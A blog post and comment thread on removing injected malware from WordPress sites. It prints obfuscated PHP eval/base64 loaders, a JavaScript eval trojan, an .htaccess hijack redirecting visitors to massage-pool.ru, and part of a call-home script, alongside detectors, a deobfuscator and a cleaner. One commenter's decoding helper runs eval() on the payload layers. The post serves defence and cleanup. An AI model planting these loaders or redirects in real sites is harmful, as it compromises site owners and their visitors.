[Solve] WordPress Malware Script Attack Fix

Our server was hacked and every PHP file was infected. Each file had malicious code injected into it (samples below); the injected code decodes a loader that calls another PHP file hidden elsewhere on the server and runs it. To clean up, the malicious code has to be removed from every file, which is really frustrating when you have hundreds of infected files, so I wrote a script that does it automatically.

List of malicious code / malware scripts I have encountered so far:

A. c99madshell – a web shell: it lets the attacker browse your database and read, edit and upload files with the permissions of the web server user, just like an admin. Below is the sample code of the loader that was injected. The $wp_salt array holds the characters of eval(gzinflate(base64_decode($v))); in shuffled order and the long concatenation puts them back in sequence, so create_function() yields a one-argument function that decodes and runs whatever base64 string it is handed:

<?php
$md5 = "2b351068f6742153073f3af2e7fa11de";
$wp_salt = array('6',"r",')',"f",'i','4',"z",'_','(','e',";","g","o",'b',"a","$","v","d","t",'n','c',"l","s");
$wp_add_filter = create_function('$'.'v',$wp_salt[9].$wp_salt[16].$wp_salt[14].$wp_salt[21].$wp_salt[8].$wp_salt[11].$wp_salt[6].$wp_salt[4].$wp_salt[19].$wp_salt[3].$wp_salt[21].$wp_salt[14].$wp_salt[18].$wp_salt[9].$wp_salt[8].$wp_salt[13].$wp_salt[14].$wp_salt[22].$wp_salt[9].$wp_salt[0].$wp_salt[5].$wp_salt[7].$wp_salt[17].$wp_salt[9].$wp_salt[20].$wp_salt[12].$wp_salt[17].$wp_salt[9].$wp_salt[8].$wp_salt[15].$wp_salt[16].$wp_salt[2].$wp_salt[2].$wp_salt[2].$wp_salt[10]);
$wp_add_filter('FZnHEqvGFkU/x3YxIKdyeUDOGZEmr8gZRA5f/3SH0gS6+/...');
?>

B. Trojan – a single eval(base64_decode("...")) statement inserted into the file:

<?php
...
eval(base64_decode("..."));
...

C. Trojan – a function with a random name whose body is just eval('$almi=base64_decode($almi);') spelled out in fragments; the payload it unpacks is then run through strtr() with a scrambled alphabet before the final eval:

<?php
if(!function_exists('b4xvpqj38lpm8ux')){function b4xvpqj38lpm8ux($almi){$ddhg='mi=';$obwyp2='ba';$tqmtyx='$a';$dl8u6='4';$ufhk7=';';$fead2i='l';$jqml='e';$gndg='c';$c8px1='al';$fnidfi='ode';$u5vntk='se6';$uhoe='($';$wucoiz='_d';$ebexu='mi)';eval($tqmtyx.$fead2i.$ddhg.$obwyp2.$u5vntk.$dl8u6.$wucoiz.$jqml.$gndg.$fnidfi.$uhoe.$c8px1.$ebexu.$ufhk7);return $almi;}$dn4b2l='...';eval(b4xvpqj38lpm8ux('JGRuNGIybD1iNHh2cHFqMzhscG04dXgoJGRuNGIybCk7JGRuNGIybD1zdHJ0cigkZG40YjJsLCdnKzQhdk9WdS9OYnc5V0Ege0hCNUU4PmpJaHRxb01zeENUbllfYXBRKDwuMm1SNzFKUyJacktYaWZsKXkKOmV9RDN8UDY9Y0wway0qR3pGLFVkJywn...'));}

D. JavaScript trojan – inserted into the HTML output (usually through index.php); it rebuilds a script from a list of numbers and hands it to window.eval:

<script>if(window.document)aa=[]+0;aaa=0+[];if(aa.indexOf(aaa)===0){ss='';try{new location(12);}catch(qqq){...}ee='e';e=window.eval;t='y';}h=-4*Math.tan(Math.atan(0.5));n="3.5a3.5a51.5a50a15a19a49a54...".split("a");for(i=0;i-n.length

E. .htaccess – the code below redirects your visitors to the attacker's site (massage-pool.ru). The RewriteCond lines only fire when the Referer header names a search engine or social site, so a visitor who arrives from Google is redirected while the site owner, who types the address directly, sees a normal page. The ErrorDocument lines additionally send every 400/401/403/404/500 error page to the same URL (Apache treats an absolute URL in ErrorDocument as a redirect).

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://massage-pool.ru/mysave/index.php [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://massage-pool.ru/mysave/index.php [R=301,L]
</IfModule>

ErrorDocument 400 http://massage-pool.ru/mysave/index.php
ErrorDocument 401 http://massage-pool.ru/mysave/index.php
ErrorDocument 403 http://massage-pool.ru/mysave/index.php
ErrorDocument 404 http://massage-pool.ru/mysave/index.php
ErrorDocument 500 http://massage-pool.ru/mysave/index.php
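A quick way to find this kind of .htaccess hijack on a host with many sites is to flag every RewriteRule or ErrorDocument whose target is an absolute URL on a host you do not own, plus any RewriteCond that keys on HTTP_REFERER (that is the tell-tale of a redirect meant to be seen only by search-engine traffic). The Python script below is an added example, not the cleaner from this page; the sample .htaccess is a shortened copy of the injected one above with one legitimate redirect added, and www.example.com stands in for your own domain.

```python
import re
from urllib.parse import urlparse

# Shortened copy of the injected .htaccess shown above, plus one legitimate
# redirect to the site's own host (constructed sample input).
SAMPLE_HTACCESS = """\
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|bing|facebook|twitter)\\.(.*)
RewriteRule ^(.*)$ http://massage-pool.ru/mysave/index.php [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(ebay|icq|goo)\\.(.*)
RewriteRule ^(.*)$ http://massage-pool.ru/mysave/index.php [R=301,L]
RewriteRule ^old-page$ http://www.example.com/new-page [R=301,L]
</IfModule>

ErrorDocument 403 /errors/403.html
ErrorDocument 404 http://massage-pool.ru/mysave/index.php
ErrorDocument 500 http://massage-pool.ru/mysave/index.php
"""

_RULE_RE = re.compile(r"^(RewriteRule)\s+\S+\s+(\S+)", re.I)
_ERRDOC_RE = re.compile(r"^(ErrorDocument)\s+\d{3}\s+(\S+)", re.I)
_REFERER_RE = re.compile(r"^RewriteCond\s+%\{HTTP_REFERER\}", re.I)

def external_targets(htaccess_text, own_hosts):
    """Return (line_no, directive, host) for every redirect target that is not one of your own hosts."""
    own = {h.lower() for h in own_hosts}
    hits = []
    for line_no, line in enumerate(htaccess_text.splitlines(), 1):
        line = line.strip()
        m = _RULE_RE.match(line) or _ERRDOC_RE.match(line)
        if not m:
            continue
        directive, target = m.groups()
        if not re.match(r"https?://", target, re.I):
            continue  # relative path or local file: not a redirect off-site
        host = (urlparse(target).hostname or "").lower()
        if host not in own:
            hits.append((line_no, directive, host))
    return hits

def referer_conditions(htaccess_text):
    """Count RewriteCond lines that test the Referer header."""
    return sum(1 for l in htaccess_text.splitlines() if _REFERER_RE.match(l.strip()))

def report(htaccess_text, own_hosts):
    """Human-readable summary of external_targets() and referer_conditions()."""
    lines = ["line %d: %s -> %s" % hit for hit in external_targets(htaccess_text, own_hosts)]
    lines.append("%d RewriteCond line(s) test HTTP_REFERER" % referer_conditions(htaccess_text))
    return "\n".join(lines)

if __name__ == "__main__":
    print(report(SAMPLE_HTACCESS, {"www.example.com", "example.com"}))
```

Run it against each site's .htaccess with that site's own host names; any hit is either a redirect you set up yourself or an injection, and a non-zero Referer count next to an external target is almost always the latter.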

F. TimThumb vulnerability

timthumb.php is an image cropping and resizing script bundled with most premium WordPress themes. The 1.x versions before 1.35 would fetch an "image" from any remote URL whose host name merely contained a site from the script's built-in whitelist (a substring check, so a domain the attacker controls passed it) and write the response into the cache directory, which let an attacker drop a PHP file onto the server and execute it. From there they have the same access as the web server: read wp-config.php and the database, insert malicious code into all of your PHP files, create further malicious PHP scripts, and a lot more.

Any timthumb.php or thumb.php below version 1.35 is vulnerable. I advise updating the file to version 2.0 or later.

Solution: Update your file here: http://timthumb.googlecode.com/svn/trunk/timthumb.php
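Themes often ship their own copy of the script, sometimes renamed to thumb.php, so a single update is easy to miss. The Python script below is an added example (not one of this page's tools) that walks a document root and reads the VERSION constant out of every timthumb.php or thumb.php it finds. It assumes the version is declared as define ('VERSION', '1.34'); as in TimThumb's source; a file without that constant is reported as unknown and should be inspected by hand.

```python
import os
import re

# TimThumb declares its version as: define ('VERSION', '2.8.14');  (assumed format)
_VERSION_RE = re.compile(r"""define\s*\(\s*['"]VERSION['"]\s*,\s*['"]([0-9]+(?:\.[0-9]+)*)['"]\s*\)""")
FIXED_IN = (1, 35)   # the page's threshold: anything below 1.35 is vulnerable

def parse_version(text):
    """'1.34' -> (1, 34); tuples compare the way version numbers should."""
    return tuple(int(part) for part in text.split("."))

def timthumb_version(source):
    """The VERSION constant of a timthumb.php source, or None if it has none."""
    m = _VERSION_RE.search(source)
    return m.group(1) if m else None

def is_vulnerable(version):
    return parse_version(version) < FIXED_IN

def classify(source):
    """'vulnerable', 'ok' or 'unknown' for one file's contents."""
    version = timthumb_version(source)
    if version is None:
        return "unknown"
    return "vulnerable" if is_vulnerable(version) else "ok"

def scan(root):
    """Yield (path, version, verdict) for every timthumb.php / thumb.php under root."""
    for directory, _, files in os.walk(root):
        for name in files:
            if name.lower() in ("timthumb.php", "thumb.php"):
                path = os.path.join(directory, name)
                with open(path, encoding="latin-1") as fh:
                    source = fh.read()
                yield path, timthumb_version(source), classify(source)

if __name__ == "__main__":
    import sys
    for path, version, verdict in scan(sys.argv[1] if len(sys.argv) > 1 else "."):
        print("%-10s %-8s %s" % (verdict, version or "?", path))
```

Run it as python timthumb_scan.py /path/to/public_html; every "vulnerable" or "unknown" line is a file to replace with the current release.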

G. class-wheel.php

As far as I have decoded the file, the script sends information about your server to thebestcache.com, fetches data back from that server and executes it. With this, the attacker can do whatever they want to your server, just as with TimThumb: write RewriteRules into your .htaccess to redirect users to their own site, insert malicious iframes and JavaScript, and a lot more.

Solution: Delete this file immediately.

Below is a snippet of the script. The $GLOBALS['_1739858145_'] array is a list of PHP function names (error_reporting, ini_set, socket_getpeername, preg_replace, base64_encode, serialize, file_get_contents, base64_decode, unserialize, …) broken into concatenated fragments so that grepping the file for those names finds nothing; the rest of the script calls them through the array:

<? $GLOBALS['_1739858145_']=Array('e' .'rror' .'_' .'r' .'eporting','' .'in' .'i_' .'se' .'t','in' .'i_set','' .'soc' .'k' .'et_' .'get' .'peerna' .'m' .'e','s' .'trto' .'k','strpbrk','session_' .'i' .'s_reg' .'ist' .'ered','preg_replace','ima' .'gecre' .'at' .'efro' .'mg' .'i' .'f','ar' .'ray_pop','implode','preg_mat' .'ch','i' .'m' .'pl' .'ode','preg_ma' .'t' .'ch','str' .'ripos','fl' .'o' .'ck','array_f' .'lip','mt_rand','p' .'reg_' .'match','p' .'reg_mat' .'ch','im' .'pl' .'o' .'de','p' .'reg_' .'m' .'a' .'tch','' .'b' .'as' .'e64_encode','ser' .'ialize','fi' .'l' .'e' .'_get' .'_c' .'ontents','b' .'ase64_d' .'ecode','preg_m' .'atch','' .'pre' .'g_rep' .'la' .'ce','' .'preg_replace','u' .'nse' .'ri' .'alize','base64' .'_d' .'e' ...

H. god_mode_on – the injection is wrapped in marker comments, /*god_mode_on*/ … /*god_mode_off*/ or /*<md5>_on*/ … /*<md5>_off*/, which makes it easy to match. The second form stores every character of the function names as a number plus a per-array offset: subtracting 9999, 4793 and 6196 from the three arrays gives eval, create_function and base64_decode, so at run time it builds the same eval(base64_decode($x)) function and calls it on the long base64 string, which itself decodes to yet another eval(base64_decode("…")):

<?php /*god_mode_on*/eval(base64_decode("ZXZhbChiYXNl...")); /*god_mode_off*/ ?>
<?php /*f2c315e178b39d12fa925987425e4e25_on*/ $Py0IAoRh= array('10100','10117','10096','10107');$VMteSwXRc7lP= array('4892','4907','4894','4890','4909','4894','4888','4895','4910','4903','4892','4909','4898','4904','4903');$xvak07gN5kcVT= array('6294','6293','6311','6297','6250','6248','6291','6296','6297','6295','6307','6296','6297');$YMBF7WGci7Z07sbiK1DbxiRKDEF4gdT8PkEN6aPf8F66X="ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTm...";if (!function_exists("TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5")){ function TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5($MxwA7W2O5hdqavGiLlWRsjFStqs84USMiedg16,$bdXddjKlUV8Cdh7WBoeziZiV7nZeeVY1YL51UFdFr){$Puj6hKkmatbif9v4dAP2sDDnvoTyUazSvJOCkZOkjQtoPPiTg = '';foreach($MxwA7W2O5hdqavGiLlWRsjFStqs84USMiedg16 as $QyrfMMuvbewBXSaCkksZvBGOPmuX5ALH){$Puj6hKkmatbif9v4dAP2sDDnvoTyUazSvJOCkZOkjQtoPPiTg .= chr($QyrfMMuvbewBXSaCkksZvBGOPmuX5ALH - $bdXddjKlUV8Cdh7WBoeziZiV7nZeeVY1YL51UFdFr);}return $Puj6hKkmatbif9v4dAP2sDDnvoTyUazSvJOCkZOkjQtoPPiTg;}$zs4ALsgC4dMC1kTLd = TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5($Py0IAoRh,9999);$G2dp21boYT5TLmcF = TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5($VMteSwXRc7lP,4793);$JYTgSWSlO34p7zE0CUStV6iE22ff5LSJAB = TwkpVxi5t7kKxcisxQ0L6jIYIqT2VNZIa9YVw7RQ5($xvak07gN5kcVT,6196);$eozu2spipON = $G2dp21boYT5TLmcF('$MxYAjVJONC',$zs4ALsgC4dMC1kTLd.'('.$JYTgSWSlO34p7zE0CUStV6iE22ff5LSJAB.'($MxYAjVJONC));');$eozu2spipON($YMBF7WGci7Z07sbiK1DbxiRKDEF4gdT8PkEN6aPf8F66X);} /*f2c315e178b39d12fa925987425e4e25_off*/ ?>

I. Trojan – every function name is written as \xHH / octal escapes and reversed: "\x65\144\x6f\154\x70\170\x65" is "edolpxe" (explode), "\x73\164\x72\162\x65\166" is "strrev" and "\x65\143\x61\154\x70\145\x72\137\x67\145\x72\160" is "ecalper_gerp" (preg_replace). The arithmetic such as chr(2687.5*0.016) is just chr(43), the "+" delimiter of the payload. The pieces come together as a preg_replace() call with the /e modifier, which evaluates the replacement as PHP and so runs base64_decode() of the real payload stored in $eva1fYlbakBcVSir:

<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1Uj...";$eva1tYlbakBcVSir = "\x65\144\x6f\154\x70\170\x65";$eva1tYldakBcVSir = "\x73\164\x72\162\x65\166";$eva1tYldakBoVS1r = "\x65\143\x61\154\x70\145\x72\137\x67\145\x72\160";$eva1tYidokBoVSjr = "\x3b\51\x29\135\x31\133\x72\152\x53\126\x63\102\x6b\141\x64\151\x59\164\x31\141\xp76\145\x24\50\x65\144\x6f\143\x65\144\x5f\64\x36\145\x73\141\x62\50\x6c\141\xp76\145\x40\72\x65\166\x61\154\x28\42\x5c\61\x22\51\x3b\72\x40\50\x2e\53\x29\100\x69\145";$eva1tYldokBcVSjr=$eva1tYldakBcVSir($eva1tYldakBoVS1r);$eva1tYldakBcVSjr=$eva1tYldakBcVSir($eva1tYlbakBcVSir);$eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir);$eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061];$eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;$eva1tYldakBcVSir = "\x73\164\x72\x65\143\x72\160\164\x72";$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";$eva1tYldakBoVS1r = "\x65\143\x72\160";$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} ?>
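The loaders in A, C, H and I all hide the same few calls (eval, base64_decode, gzinflate, create_function, preg_replace) behind character arrays, numeric offsets, escape sequences and string reversal. The Python script below is an added example (not the cleaner script from this page, and written in Python rather than PHP so it runs on an analyst's machine without executing anything): it rebuilds the strings from the pieces exactly as the loaders do and peels nested eval(base64_decode(...)) / eval(gzinflate(base64_decode(...))) layers without evaluating them. The pieces, indices and offsets are copied from the samples above; the layered payload used to exercise unwrap() is constructed in the script, because the real payloads are truncated on this page.

```python
import base64
import re
import zlib

# Section A: the loader body is spelled out as indices into a character array.
WP_SALT = ['6', "r", ')', "f", 'i', '4', "z", '_', '(', "e", ";", "g", "o",
           'b', "a", "$", "v", "d", "t", 'n', "c", "l", "s"]
A_INDICES = [9, 16, 14, 21, 8, 11, 6, 4, 19, 3, 21, 14, 18, 9, 8, 13, 14, 22,
             9, 0, 5, 7, 17, 9, 20, 12, 17, 9, 8, 15, 16, 2, 2, 2, 10]

def join_pieces(pieces, indices):
    """Concatenate pieces[i] for each index, as the A loader does before create_function()."""
    return "".join(pieces[i] for i in indices)

# Section H: each character is stored as ord(c) + offset, one offset per array.
def decode_offset(numbers, offset):
    """Reverse the god_mode_on encoder: chr(n - offset) for every number."""
    return "".join(chr(n - offset) for n in numbers)

# Section I: names are PHP "\xHH" / "\NNN" escapes, usually reversed afterwards.
_ESCAPE_RE = re.compile(r"\\x[0-9A-Fa-f]{1,2}|\\[0-7]{1,3}")

def php_unescape(s):
    """Resolve hex and octal escapes the way a PHP double-quoted string would."""
    def repl(m):
        tok = m.group(0)
        return chr(int(tok[2:], 16)) if tok[1] == "x" else chr(int(tok[1:], 8))
    return _ESCAPE_RE.sub(repl, s)

# Nested eval(base64_decode("...")) and eval(gzinflate(base64_decode('...'))) wrappers.
_LAYER_RE = re.compile(
    r"eval\s*\(\s*(?P<gz>gzinflate\s*\(\s*)?base64_decode\s*\(\s*['\"]"
    r"(?P<b64>[A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)\s*\)?\s*;?")

def gzinflate(data):
    """PHP gzinflate() is raw DEFLATE with no zlib/gzip header: wbits = -15."""
    return zlib.decompress(data, -15)

def unwrap(php_text, max_layers=20):
    """Peel eval() wrappers until plain PHP remains. Nothing is executed."""
    for _ in range(max_layers):
        m = _LAYER_RE.search(php_text)
        if not m:
            return php_text
        data = base64.b64decode(re.sub(r"\s", "", m.group("b64")))
        if m.group("gz"):
            data = gzinflate(data)
        php_text = data.decode("latin-1")
    raise ValueError("more than %d layers, giving up" % max_layers)

def build_sample(inner_php, layers, gz):
    """Construct a layered payload the way the loaders do. Test input only, not real malware."""
    text = inner_php
    for _ in range(layers):
        raw = text.encode("latin-1")
        if gz:
            compressor = zlib.compressobj(9, zlib.DEFLATED, -15)
            raw = compressor.compress(raw) + compressor.flush()
        b64 = base64.b64encode(raw).decode("ascii")
        text = ("eval(gzinflate(base64_decode('%s')));" if gz
                else 'eval(base64_decode("%s"));') % b64
    return text

if __name__ == "__main__":
    print(join_pieces(WP_SALT, A_INDICES))                        # section A body
    print(decode_offset([10100, 10117, 10096, 10107], 9999))      # section H
    print(php_unescape(r"\x65\144\x6f\154\x70\170\x65")[::-1])   # section I
    print(unwrap(build_sample("<?php echo 'hi'; ?>", 3, True)))
```

Because unwrap() only decodes and inflates, it can be run on the raw payload without PHP and without any risk of executing it; the final text is what the loader would have passed to eval(), typically an include of a hidden file whose path you then know to delete.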

Most of these attacks happen when you run old versions of your software (WordPress, Joomla, TimThumb, WordPress plugins), use weak FTP or SFTP passwords, or have an infected computer whose saved FTP credentials are stolen and then used to log in to your site. Make sure you are running updated versions of your programs.

Download and Install
Download the cleaner script below and put it in your root directory (or any directory). The program checks every PHP file under that directory, including sub-directories, and cleans it if it is infected with one of the malware patterns above.

Malware code keeps coming back
If you remove the malware successfully but it keeps coming back, something you have not found yet is re-injecting it (the injected code usually includes a hidden PHP file elsewhere on the server, and a web shell may still be present). I suggest running the malware scanner: http://www.php-beginners.com/wordpress-hack-malware-scanner.html and sending the scan result to info@php-beginners.com; we need to find the file that causes the malicious code to come back.

You can download two types of cleaner script,
a web browser version and a shell access version. You can use either of the two.

  • Cleaner 2.10 HTTP version (cleaner_2.10.zip, 2 kB): upload cleaner_2.10.php and open it in your favourite browser.
    Example: http://www.yoursite.com/cleaner_2.10.php
    Delete cleaner_2.10.php from the web root as soon as it has finished; while it is there, anyone who guesses the URL can run it.
  • Cleaner CLI 2.10 version (cleaner-cli_2.10.zip, 2 kB): run it from a terminal or command line.
    Example: $ time php cleaner-cli_2.10.php >> cleaner_log 2>&1
    The command above runs cleaner-cli_2.10.php and appends its output, errors included, to the cleaner_log file. Keep the redirections in this order: with 2>&1 >> cleaner_log, stderr is duplicated to the terminal before stdout is sent to the file, so the errors never reach the log.

Note:
Please don't forget to create a backup of your WordPress files, or at least of the /wp-content/ directory, before running the cleaner. Use shell access to back up files because it is fast and easy.
You can do it like this: $ tar -cvzf [output_file.tar.gz] [directory]

[~/wordpress-directory]# tar -cvzf wp-backup-content-only.tar.gz ./wp-content
or
[~/wordpress-directory]# tar -cvzf wp-backup-all.tar.gz ./

This malware cleaner script works on any PHP program, so you can run it on non-WordPress sites too, but please create a backup of your files before you run it, so that you can recover easily if a pattern removes more than it should.
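The cleaner from this page is a PHP script that matches the injected code with a regular expression and strips it. As an added example (not the author's cleaner, and in Python so that it does not depend on the web server's PHP, its memory_limit or its disabled functions), the script below does the same for the patterns documented on this page: the god_mode_on and <md5>_on/_off blocks (H), the $wp_salt create_function loader (A), the $eva1fYlbakBcVSir block (I), and a bare eval(base64_decode("…")); statement whose argument is a literal string (B, and the case discussed in the comments where the eval sits just after a file's own <?php tag). Every pattern anchors on the literal base64 string or on the marker, so a file's own opening <?php tag survives; an unanchored \s*eval\s*\([^\)]+\)\)\; would also remove legitimate eval() calls. The sample inputs are constructed from the snippets on this page (the create_function line in SAMPLE_A is shortened).

```python
import os
import re
import shutil

_B64 = r"[A-Za-z0-9+/=\s]+"
_COMMENT = r"(?:/\*[^*]*\*/\s*)?"

# Order matters: whole <?php ... ?> blocks first, the bare statement last.
PATTERNS = [
    # H: <?php /*god_mode_on*/ eval(base64_decode("...")); /*god_mode_off*/ ?>
    re.compile(r"<\?php\s*" + _COMMENT + r"eval\s*\(\s*base64_decode\s*\(\s*['\"]"
               + _B64 + r"['\"]\s*\)\s*\)\s*;\s*" + _COMMENT + r"\?>\s*"),
    # H, second form: everything between /*<md5>_on*/ and the matching /*<md5>_off*/
    re.compile(r"<\?php\s*/\*([0-9a-f]{32})_on\*/.*?/\*\1_off\*/\s*\?>\s*", re.S),
    # A: the $md5 / $wp_salt / create_function loader
    re.compile(r"<\?php\s*\$md5\s*=\s*\"[0-9a-f]{32}\";\s*\$wp_salt\s*=\s*array\(.*?\);\s*"
               r"\$wp_add_filter\s*=\s*create_function\(.*?\);\s*\$wp_add_filter\('[^']*'\);\s*\?>\s*", re.S),
    # I: the $eva1fYlbakBcVSir block
    re.compile(r"<\?php\s*@error_reporting\(0\);\s*if\s*\(!isset\(\$eva1fYlbakBcVSir\)\)\s*\{.*?\}\s*\?>\s*", re.S),
    # B: a bare eval(base64_decode("<literal>")); left inside the file's own <?php block
    re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*['\"]" + _B64 + r"['\"]\s*\)\s*\)\s*;"),
]

def clean_source(src):
    """Return (cleaned_source, number_of_injections_removed)."""
    total = 0
    for pattern in PATTERNS:
        src, n = pattern.subn("", src)
        total += n
    return src, total

def clean_tree(root, dry_run=True):
    """Clean every .php file under root, keeping the original as <file>.infected. Returns [(path, n)]."""
    changed = []
    for directory, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(directory, name)
            with open(path, encoding="latin-1", newline="") as fh:
                original = fh.read()
            cleaned, n = clean_source(original)
            if n == 0:
                continue
            changed.append((path, n))
            if not dry_run:
                shutil.copy2(path, path + ".infected")
                with open(path, "w", encoding="latin-1", newline="") as fh:
                    fh.write(cleaned)
    return changed

# Constructed samples: the H marker block followed by the file's real code; the
# A loader (create_function line shortened); and an eval() inserted after a file's own <?php.
SAMPLE_H = '<?php /*god_mode_on*/eval(base64_decode("ZXZhbChiYXNl")); /*god_mode_off*/ ?>\n<?php\necho "site";\n'
SAMPLE_A = r"""<?php
$md5 = "2b351068f6742153073f3af2e7fa11de";
$wp_salt = array('6',"r",')',"f",'i','4',"z",'_','(','e',";","g","o",'b',"a","$","v","d","t",'n',"c","l","s");
$wp_add_filter = create_function('$'.'v',$wp_salt[9].$wp_salt[16].$wp_salt[14].$wp_salt[21]);
$wp_add_filter('FZnHEqvGFkU/x3YxIKdyeUDOGZEmr8gZRA5f/3SH0gS6+/...');
?>
"""
SAMPLE_INLINE = '<?php\n\t\teval(base64_decode("QUJD"));\n// theme code follows\necho base64_decode("aGVsbG8=");\n'

if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, n in clean_tree(root, dry_run="--write" not in sys.argv):
        print("%s: %d injection(s)" % (path, n))
```

Run it first without --write to see which files would change, then with --write to modify them. Afterwards run php -l on every changed file: a parse error means a pattern matched more than the injection, and the untouched copy is in <file>.infected. The patterns only remove the dropper that was injected into each file; the hidden PHP file it includes and any web shell still have to be found and deleted, and the FTP, database and WordPress passwords changed, or the injection simply returns.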

If you run into malware that I don't know about, please let me know so that I can add it to the program. Thanks.


279 Responses to [Solve] WordPress Malware Script Attack Fix

  1. Really great creation for WordPress Malware Script Attack Fix.

  2. Ashish says:

    Wow amazing nice! it worked!

  3. graeme says:

    Hi, does anyone know specifically what flaw created this issue? Was it definitely WordPress? If so, does anyone have a permanent fix? Also, does anyone know what this script specifically does aside from injecting the malicious code into other scripts? To me, it appears it also captures credentials and/or attempts other hacks. I haven't looked at all the code, but I'm hoping someone has more information on this.

    The script works by recursively evaluating a piece of code that is encoded & inflated. For assistance, I've created a helper function which, when given the string passed to wp_add_filter, will decode the string and display the final readable PHP that is ultimately evaluated:

    function resolve($str) {
        // Each layer is base64 text of a raw-deflate stream; keep peeling
        // until the result no longer starts with "eval".
        while (true) {
            $str = gzinflate(base64_decode($str));
            if (substr($str, 0, 4) != "eval") break;
            print $str;
            print "\n\n";
            // Take the quoted payload of the next eval(gzinflate(base64_decode('...'))) layer.
            $pos  = strpos($str, "'") + 1;
            $rpos = strrpos($str, "'");
            $str  = substr($str, $pos, $rpos - $pos);
        }
        print $str;
    }

    As the author stated, the above runs another PHP script hidden in a random folder, which is much larger and includes most of the malicious code that not only injects itself into other scripts but appears to collect credentials, access other URLs, run brute force, etc. I've not analyzed this larger code, but if someone has additional information, it would be helpful for preventing this in the future.

    Thanks!

    • admin says:

      Hello Graeme,

      You can try this script to decrypt the code:

      <?php
      header("Content-type:text/plain");
      // Outer layer: the string the loader passes to $wp_add_filter (replace it with yours)
      $malwareCode = gzinflate(base64_decode("FZnFDuvWAkU/p608MJOqDs.........................."));

      // While the result is still another eval(gzinflate(...)) wrapper, run only the
      // decoding part (the leading "eval" is turned into an assignment) and recurse.
      function malDecrypt($m){
          if(preg_match("/^eval\(gzinflate/", $m)){
              eval(str_replace("eval", "\$m=", $m));
              return malDecrypt($m);
          }else
              return $m;
      }

      echo malDecrypt($malwareCode);

      Run this with your $malwareCode; make sure you replace the malware code. In my situation, the malware script looks like this:

      if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){
      	$GLOBALS['mfsn']='/home3/hmjohnco/public_html/whatscrapandwhatsnot/cgi-bin/255.php';
      	if(file_exists($GLOBALS['mfsn'])){
      		include_once($GLOBALS['mfsn']);
      		if(function_exists('gml')&&function_exists('dgobh')){
      			ob_start('dgobh');
      		}
      	}
      }

      I didn't really get into the details of the code. What I did was delete the file it is calling. If you have enough time you can try to decrypt the file and share with us what you've found. I think it's interesting.

      I think the attack happened because we are using a shared server. I don't think it's in WordPress, but I'm not really sure about that.

      These hackers are really good, because sometimes I have a hard time entering the FTP because I forgot my password, but they (the hackers) can easily get in and inject all those files. Amazing.

      Anyway, thanks for sharing Graeme. Hope they’ll stop bugging us, because they really cost a lot of time.

      Thanks Graeme :)

  4. Marin says:

